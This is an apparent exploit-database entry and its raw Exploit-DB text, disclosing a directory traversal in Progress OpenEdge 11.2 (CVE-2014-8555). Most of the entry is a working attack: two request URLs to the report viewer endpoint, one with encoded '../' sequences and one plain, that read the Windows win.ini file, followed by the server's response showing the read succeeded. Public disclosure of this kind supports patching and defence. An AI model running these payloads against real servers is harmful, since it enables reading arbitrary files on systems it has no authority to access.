Progress OpenEdge Directory Traversal

vendor:

OpenEdge

by:

Mauricio Correa

N/A

CVSS

N/A

Directory Traversal

N/A

CWE

Product Name: OpenEdge

Affected Version From: 11.2

Affected Version To: 11.2

Patch Exists: N/A

Related CWE: CVE-2014-8555

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows OS

2014

Progress OpenEdge Directory Traversal

The malicious user sends a malformed request that generates the file access up directories as follows: http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini or else http://target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../../../windows/win.ini And the application answers; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1

Mitigation:

N/A

Source

Exploit-DB raw data:

# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555

 

The malicious user sends a malformed request that generates the file access
up directories as follows: 

 

http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 

 

or else 

 

http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini 

 

 

And the application answers

 

; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

CMCDLLNAME32=mapi32.dll

CMC=1

MAPIX=1

MAPIXVER=1.0.0.1

OLEMessaging=1

 

 

More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256

 

Thanks